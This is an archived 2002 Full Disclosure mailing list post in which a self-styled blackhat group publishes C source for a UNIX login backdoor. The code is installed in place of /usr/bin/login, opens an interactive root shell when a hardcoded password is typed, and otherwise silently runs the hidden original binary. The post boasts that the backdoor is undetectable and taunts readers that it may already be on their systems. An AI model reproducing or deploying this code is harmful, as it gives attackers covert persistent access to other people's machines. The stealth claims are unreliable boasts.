Full Disclosure mailing list archives
[ElectronicSouls] - New Backdoor Technique
From: es () hush com
Date: Fri, 29 Nov 2002 08:45:34 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here's a backdoor we wrote a while ago that is 100% stealth and cannot be detected. Be warned that such a backdoor may have been installed on your system, as we are the Immortal Blackhats. # cat symbsd.c /* * [ E l e c t r o n i c - S o u l s ] * * Symbiose - UNIX Deamon Backdoor * (C) BrainStorm * * you have 1 second to enter the passwd, * else it will execute the original deamon. * */ #include<signal.h> #include<stdio.h> #include<string.h> #include<unistd.h> #define ORIGINAL "/usr/bin/.login" /* the new path of the original deamon execu table. */ #define BACKDOOR "/usr/bin/login" /* u can also back door other deamons of cou rse ;) */ #define PASS "es" /* u may want to change this password.. */ char **execute; char passwd[3]; int main(int argc, char *argv[]) { void connection(); signal(SIGALRM,connection); alarm(3); execute=argv; *execute=BACKDOOR; scanf("%s",passwd); if(strcmp(passwd,PASS)==0) { alarm(0); printf(" ****************************************************************** \n"); printf(" ****************************************************************** \n"); printf("[ *** Welcome to Symbiose ;) -- (C) BrainStorm [ElectronicSouls] *** ] \n"); printf(" ****************************************************************** \n"); printf(" ****************************************************************** \n\n"); execl("/bin/sh","/bin/sh","-i",0); execv("id",execute); exit(0); } else { execv(ORIGINAL,execute); exit(0); } } void connection() { execv(ORIGINAL,execute); exit(0); } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "We don't know Latin." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nmcEMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltRr4An0oFAwVWHvQF D3Xz84s4c3PFwEkuAJoDkE+GhGc8QCZdV5Z/rwWl3LQH0w== =0rBN -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - New Backdoor Technique es (Nov 29)